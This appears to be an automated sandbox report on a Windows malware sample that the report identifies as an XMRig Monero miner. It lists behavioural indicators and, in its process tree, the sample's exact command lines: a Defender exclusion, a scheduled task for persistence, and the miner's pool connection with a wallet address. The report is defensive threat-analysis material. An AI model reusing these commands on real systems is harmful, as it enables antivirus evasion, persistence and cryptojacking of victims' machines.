Analysis
-
max time kernel
93s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2022 20:13
Static task
static1
Behavioral task
behavioral1
Sample
e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe
Resource
win7-20221111-en
General
-
Target
e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe
-
Size
2.0MB
-
MD5
458aea46c863b50682715900a848ff26
-
SHA1
77cd33d12812df7c50bee28a234f9880d8ad2498
-
SHA256
e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10
-
SHA512
ec4732d7fc1d961f218f9c19d75f3aea633cb468b400df6fe009f9a5c27c344a1b4790a5422838ff4b8aef0cf9b1bb241d3b6aaeaf2b8f762055a4d09e7d903d
-
SSDEEP
49152:28DkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3g3jkl83wdS8P+8Vv9:2okfRX4UTDennUI3g34lmi
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral2/memory/3508-160-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3508-161-0x0000000140343234-mapping.dmp xmrig behavioral2/memory/3508-162-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3508-163-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3508-165-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral2/memory/3508-170-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 432 set thread context of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
pid pid_target Process procid_target 4424 432 WerFault.exe 79 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4052 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2336 powershell.exe 2336 powershell.exe 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 648 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeLockMemoryPrivilege 3508 vbc.exe Token: SeLockMemoryPrivilege 3508 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3508 vbc.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 432 wrote to memory of 2336 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 80 PID 432 wrote to memory of 2336 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 80 PID 432 wrote to memory of 3492 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 88 PID 432 wrote to memory of 3492 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 88 PID 3492 wrote to memory of 4052 3492 cmd.exe 90 PID 3492 wrote to memory of 4052 3492 cmd.exe 90 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91 PID 432 wrote to memory of 3508 432 e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe 91
Processes
-
C:\Users\Admin\AppData\Local\Temp\e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe"C:\Users\Admin\AppData\Local\Temp\e2bd626f3564b596991cacc52a77437c92bf6fd20dccd18bbba2cd0298a62f10.exe"1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3492 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:4052
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3508
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 432 -s 38322⤵
- Program crash
PID:4424
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 432 -ip 4321⤵PID:4312